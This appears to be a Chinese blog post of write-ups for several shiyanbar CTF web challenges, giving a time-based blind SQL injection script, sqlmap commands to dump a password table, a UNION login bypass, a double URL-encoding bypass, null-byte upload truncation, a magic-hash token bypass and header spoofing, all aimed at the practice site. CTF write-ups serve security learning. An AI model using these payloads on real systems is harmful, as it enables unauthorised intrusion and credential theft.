实验吧部分题wp

最新推荐文章于 2020-11-25 20:38:27 发布
最新推荐文章于 2020-11-25 20:38:27 发布
阅读量587 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaorouji/article/details/80460218
版权

看起来有点难

这道题有点坑,打开页面去试下登录,发现输入admin/admin会报登录失败,错误的用户名和密码,其他的就说数据库没有连上,一开始真的以为没有连上..............

然后后面看了下别人的评论,题目没错,那就可能是除了admin其他都是定义好了跳出来数据库没连上

http://ctf5.shiyanbar.com/basic/inject/index.php?username=admin' and sleep(10) and ''='&pass=&action=login

然后看见是有延时的,也就是说是可以时间盲注

然后脚本贴一波

#-*-coding:utf-8-*-
import requests
import time

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}*'

flag = ""
key = 0
print("start")
for i in range(1,50):
    if key == 1:
        break
    for payload in payloads:
        starttime = time.time()  #记录当前时间
        headers ={           #header头信息
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Encoding": "gzip, deflate",
            "Accept-lanuage": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Connection": "keep-alive",
            "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1526381912,1526540869,1527213157,1527225613; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*131924%2CnickName%3AXi4or0uji; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1527238356; source=1",

        }
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(10) else sleep(0) end and ''='&pass=&action=login" %(i,payload)  #数据库
        res = requests.get(url, headers=headers)
        if time.time() - starttime > 10:
            flag += payload
            print("pwd is:%s"%flag)
            break
        else:
            if payload == '*':
                key = 1
                break
    print('[Finally] current pwd is %s '%flag)

然后跑出来的结果是这样的

到了这里,拿admin和idnuenna登录就行了

这道题还可以sqlmap一波,不过很慢很慢...............

爆数据库

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --dbs

爆表

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" -D test --tables

爆字段

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" -D test -T admin --columns

爆密码

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" -D test -T admin -C password --dump

最后登录拿flag

程序逻辑问题

进去调试看见有个index.txt,访问试一下

<html>
<head>
welcome to simplexue
</head>
<body>
<?php


if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("********, "*****", "********");
	mysql_select_db("phpformysql") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
	echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");
	
  }
  
  
}

?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>

题目说的很清楚,读代码去找漏洞就是了

上面的sql语句看见user是可以进行注入的,然后后面又要查询查来的东西的里面pw的md5值是不是跟输入的密码的md5值相同,如果相同就出flag,然后到了这里就可以构造payload了

user=1' and 0=1 union select md5(1)#
pass=1

解释一波

这里的username前面and0=1可以让前面的查询不成功,然后后面再给一个值,那样的话就会返回一个md5(1)的值了,password再输入一个1,刚好就可以绕过出flag了

php大法

这道题进去就叫你看index.php.txt,然后有段源码

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

然后题目大概意思是要输入一个id,他的值不能是heckerDJ,但是urldecode后要是hackerDJ,看起来很矛盾,但是我们发现,浏览器传输过程是会对url进行解码的,所以我们就可以进行二次加密,构造payload

shell?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61

上传绕过

先发一张图片,然后就

那我传个php行了吧

妙啊................

这个是考了0x00截断

路径uploads/a.php+1.1.jpg如果将+的十六进制改成00,那么会认为路径已经截断了,后面的值1.1.jpg就会覆盖到前面的值,所以这样就可以绕过了

用repeater改一下加号改成00

然后go就有flag了

这里文件上传漏洞找到一篇挺好的博客

https://blog.csdn.net/wy_97/article/details/76549761

忘记密码了

这个题目真的要很细心...........发送邮件然后就看到

有个弹窗给个路径,访问下路径说没有定义然后跳回step1

但是可以看见后台是用vim写的,找下备份文件,最后在http://ctf5.shiyanbar.com/10/upload/.submit.php.swp找

所以submit的认证就是前面是管理员的邮箱地址,后面加个token,token的要求是值为0同时长度为10,这里用个科学计数法就可以绕过了,但是管理员邮箱鬼知道它是什么啊........................

后面看见前面已经给了admin@simplexue.com

然后payload都出来了

http://ctf5.shiyanbar.com/10/upload/submit.php?emailAddress=admin@simplexue.com&token=0e00000000

这里注意的是提交到submit.php,就第二张抓包的图里说了

貌似有点难

这题巨简单好吧.........

题目给了源码

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
	$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
	$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
	$cip = $_SERVER["REMOTE_ADDR"];
else
	$cip = "0.0.0.0";
return $cip;
}

$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>

其实就是改下ip就行了,用火狐改个代理flag就出来了

头有点大

这题提示巨明显

也是火狐改下代理,浏览器是ie,net framework是.NET CLR 9.9,最后语言是en-gb

发送getflag

Xi4or0uji
关注
专栏目录
实验吧-web-wp
Iambangbang的博客
08-21 630
登陆一下好吗? 这道目是一道技巧性的目,显然,问的关键在于通过语句构造使得返回报错,然而,我也并不知道如何去构造,这道是看了一位师傅的WP才写出来的,原来万能密码可以这样用……涨知识了。 ,起初尝试万能密码,提交以后,回弹 ,发现or被过滤了。。然后我就没往后想,继续策马奔腾去了,某位师傅的做法比较高明,直接构造admin’=’进行提交,回弹flag Who are you? 点
实验部分wp
sinat_38235368的博客
10-17 723
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
实验吧WEBWP
08-10
这是自己做的一个实验吧的十七到目的WP,其中也有别人的WP
实验吧WEBWP(二)
Yale的博客
03-20 1498
1.Once More(http://www.shiyanbar.com/ctf/1805) 点击—view the source code 关键码 else if (strlen(_GET['password']) < 8 &&_GET['password']) < 8 && _GET[‘password’] > 9999999) { if (strpos ($
实验吧WEBWP(一)
Yale的博客
03-19 2723
1.Forms(链接:http://www.shiyanbar.com/ctf/1819) 页面很干净,第一反应查看源码 在此之前,我们先随便输入然后点击enter,没什么线索 源码中我们看到value=0 将value改为1,再随便输入然后点击enter 毫无疑问,输入的内容就应该是a的值 得到flag2.天网管理系统(http://www.shiyanbar.com/ctf/
实验部分WP(一)
Samantha1111的博客
07-29 202
后台登陆 这道给了一个登录框,第一反应是sql注入。随便输个东西进去发现没反应,就先看看源码。 SQL注入实锤了 源码大概意思是用输入经过md5加密后的密码和admin用户名查询,结果等于sql,然后看数据库中是否存在sql。将MD5值转化为16位原始二进制格式。 知识点: mysqli_query(connection,query,resultmode)函数: connection: 必需。...
实验WP(密码学部分)【变异凯撒,传统知识+古典密码,try them all,trival】
taozijun的博客
07-10 2040
一. 变异凯撒找规律找规律,既然说是凯撒那就看看怎么移动才能得到flag。因为flag{前四个字符是确定的,所以对比下密文和flag{的ascii码。发现规律是这样,然后写个python脚本#-*- coding:utf-8 -*- from __future__ import print_function import string str = "afZ_r9VYfScOeO_UL^RWUc" ...
HECTF2020web部分wp
weixin_46330722的博客
11-25 1784
HECTF签到ezphpssrfmexiazhu 这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。 签到 点一下忘记密码 然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上 import requests url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check=' url2='&next=%E
西普实验部分逆向writeup(二)
caterpillarous的博客
12-24 4932
本博客已经弃用,我的新博客地址:http://jujuba.me/ 1.考验你能力的时候到了老规矩 PEID查壳 显示什么也没找到 先别管 拖到OD里搜索字符串看看可以发现最上面的字符串,其实挺像KEY的,输入试试,发现这个并不是KEY。进入字符串“这就是我要的flag!!!”上方下个断点,先让程序跑一下,然后断下来开始单步调试单步了几下发现一个字符串的处理,我输入的是“1234”注意左上角的EA...
实验吧WEBWP(三)
Yale的博客
03-20 653
1.Forbidden(http://www.shiyanbar.com/ctf/21) 目提示Make sure you are in HongKong 所以修改header就行了 将Accept-Language中的zh-CN修改为zh-hk就行了,(hk代表香港) 2.猫抓老鼠(http://www.shiyanbar.com/ctf/20) 都提示catch了,无疑是抓包 先
ctf-实验吧-web-Once More-wp
a3uRa的一个窝
04-14 379
  这个是我第二遍做,第一遍是第一个账号做的,当时还是小白,真的什么也不会,当然现在水平还是很低。。。   第二遍又重创了个实验吧的账号,这次打算不去上网搜 wp,自己做做看,开是刷。。。   ereg()函数漏洞,科学记数法, ~~~打开后,点击view the source code,直接可以看到源代码,毋庸置疑,代码审计 &lt;?php if (isset ($_GET['p...
实验部分WP(二)
Samantha1111的博客
08-05 508
你真的会PHP吗 看看源代码发现没啥,然后抓个包发现一个hint 打开这个http://ctf5.shiyanbar.com/web/PHP/6c525af4059b4fe7d8c33a.txt 得到PHP代码:
实验吧逆向工程Just Click---WP
Yale的博客
05-02 2191
表示只会用peid,结果还发现是个不知名的壳。。 果断换个神器 发现是C#的,于是上.NET Reflector 翻着翻着就发现了一个看名称是button check按钮检查的东西,就是它了,点进去看看 红色的就是按键的顺序,按照这个顺序按一遍就出flag了
实验吧安全杂项WP(一)
Yale的博客
03-20 6750
1.紧急报文(http://www.shiyanbar.com/ctf/1955) 密文都由ADFGX,百度一下,发现有个ADFGX密码 密码表如图 对应着解密即可 FA XX DD AG FF XG FD XG DD DG GA XF FA flagxidianctf 提交:flag_Xd{hSh_ctf:flagxidianctf}2.flag.xls(http://www.
实验吧 忘记密码了wp
0verWatch的博客
03-18 564
这个一开始给了一个登录框 先不管输入东西抓一个包看一下 发现有几样有用的东西 第一个是admin对应的邮箱admin@simplexue.com 第二个是一个Vim。。。。 这里就要讲一下一个知识点 一、vim备份文件 默认情况下使用Vim编程,在修改文件后系统会自动生成一个带~的备份文件,某些情况下可以对其下载进行查看; eg: index.php普遍意义上的首页,输入域名不...
实验吧 WEB writeup(详细基础)
weixin_43960884的博客
07-20 4694
简单的登录 不简单 后台登录 $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; 文件名ffifdyop就是目的线索 做个测试 实际上原始二进制为 'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 但由于\之后的三个符号会组合成一...
实验WP(web部分)【简单的登录,后台登录,加了料的报错注入,认真一点,你真的会PHP吗?】
taozijun的博客
05-22 7456
一. 简单的登录这道一点也不简单,用到cbc字节翻转攻击等技术,先跳过这,想了解可看实验吧上pcat大神的writeup。二. 后台登录这道
实验吧安全杂项WP(五)
Yale的博客
03-21 3143
1.SOS(http://www.shiyanbar.com/ctf/1850) 先给出答案 CTF{131Ack_3Y3_gA1AxY} 我做的时候文件名排序出了问,python也是乱码,等解决了再来写wp2.绕(http://www.shiyanbar.com/ctf/1847) 确实蛮绕的 打开网页什么都没有,F12看看 发现一段 将eval改为console.log后执行
有道云笔记 渗透测试文件上传核wp
最新发布
10-12
有道云笔记是一款文件管理和云存储平台,用户可以将各种文件上传至云端进行保存和管理。针对有道云笔记的渗透测试的文件上传核,主要是测试目标是否存在文件上传漏洞。 文件上传漏洞是指攻击者通过上传恶意文件或者利用上传功能绕过限制,成功在目标服务器上执行任意代码或者获取未授权的访问权限。攻击者可通过上传特定类型的文件,利用后台执行逻辑漏洞或者文件解析漏洞,从而实现对目标系统的攻击或控制。 针对有道云笔记的文件上传漏洞,常见的测试方法包括: 1. 尝试上传各种类型的文件:测试能否上传系统可执行文件、脚本文件或者危险的文件类型。 2. 绕过后台验证:尝试修改请求报文、绕过文件类型检查、篡改上传文件路径等,测试服务器是否能正确地执行上传操作的检查。 3. 文件解析漏洞测试:测试上传的文件是否能够被服务器直接解析,并且触发对应的解析漏洞。 4. 文件重命名与遍历:测试能否修改上传文件的文件名,并尝试通过../等目录遍历操作访问到其他敏感文件。 针对发现的漏洞和问,需要将测试结果整理成详细的渗透测试报告,包括漏洞描述、危害程度评估和修复建议等。然后与有道云笔记的开发团队和管理员进行沟通,提供测试结果和修复建议,并跟踪漏洞修复进展。 及时发现和修复文件上传漏洞,对于保护用户数据和防止潜在的攻击十分重要。因此,有道云笔记应该充分重视渗透测试的文件上传核,加强安全意识和漏洞修复的流程,确保用户数据的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值